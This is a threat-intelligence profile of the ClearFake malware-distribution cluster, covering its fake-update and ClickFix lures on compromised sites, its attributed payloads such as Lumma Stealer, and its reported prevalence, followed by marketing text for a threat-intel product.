ClearFake
ClearFake is a threat activity cluster, first identified in 2023, associated with compromised websites that have malicious JavaScript injected to deliver malware via drive-by download techniques. It is widely described as a Fake Update actor and as a malicious JavaScript framework deployed on compromised sites. Reporting also states Google tracks the original group behind EtherHiding as UNC5142. ClearFake is known for social-engineering users into self-execution, especially through fake CAPTCHA lures and malicious copy-and-paste workflows described as paste-and-run, ClickFix, and fakeCAPTCHA. It has also used fake browser update decoys on compromised WordPress sites. Multiple reports describe ClearFake as an early adopter of paste-and-run as an initial execution technique, and later reporting states it adopted ClickFix in May 2024. Observed ClearFake delivery chains include luring victims into running PowerShell or MSHTA commands, including abuse of the signed Microsoft App-V script SyncAppvPublishingServer.vbs as a living-off-the-land proxy to fetch payloads. Infrastructure and tradecraft have been linked to redirects from compromised sites to fake verification pages and to use of trusted or legitimate services and CDNs, including jsDelivr; separate reporting attributes EtherHiding development and deployment to ClearFake. Payloads attributed in the provided content include Emmenhtal Loader, NetSupport RAT, Lumma Stealer/LummaC2, ArechClient2, and ACR Stealer. One report specifically describes an ongoing CLEARFAKE campaign using ClickFix to lure victims into running MSHTA commands that ultimately deploy Lumma Stealer. Another report says researchers suspected a ClickFix campaign distributing NetSupport RAT over ClearFake infrastructure. Victimology in the provided content is broad and opportunistic through compromised websites, though one report notes App-V-dependent ClickFix chains likely skew toward enterprise-managed Windows environments. Reporting cited here says ClearFake remained highly prevalent in 2026 threat telemetry, ranking in Red Canary top-threat reporting and being described as one of the many notoriously known Fake Update actors.
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Tradecraft
42 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.
Associated malware families
5 malware families attributed to this actor across reporting.
Observables
19 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.
Recent activity
9 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Activity cluster delivering malware through compromised websites using injected JavaScript, drive-by downloads, and fake CAPTCHA/copy-paste lures.
Activity cluster that injects JavaScript into compromised websites to deliver malware, including via drive-by download techniques; also observed leveraging 'paste and run' as an initial execution technique.
Malvertising/malware distribution cluster using compromised sites and fake verification (reCAPTCHA/Turnstile) and fake browser update lures to deliver info-stealers.
A campaign that compromises WordPress sites and uses fake browser update decoys and ClickFix-style CAPTCHA lures to distribute malware, including multi-stage delivery chains using blockchain and CDN infrastructure.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.